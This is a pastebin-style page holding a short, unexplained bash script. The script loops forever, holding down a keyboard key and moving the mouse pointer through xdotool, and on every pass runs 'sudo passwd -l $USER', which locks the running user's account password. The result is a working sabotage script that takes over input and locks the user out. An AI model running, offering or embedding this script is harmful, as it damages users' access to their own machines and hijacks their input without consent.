Untitled


SUBMITTED BY: Guest

DATE: March 1, 2023, 11:09 p.m.

FORMAT: Text only

SIZE: 121 Bytes

HITS: 476

  1. #!/bin/bash
  2. while [ true ] ; do xdotool keydown 0xff7e ; xdotool mousemove --sync 1000 0 ; sudo passwd -l $USER ; done

comments powered by Disqus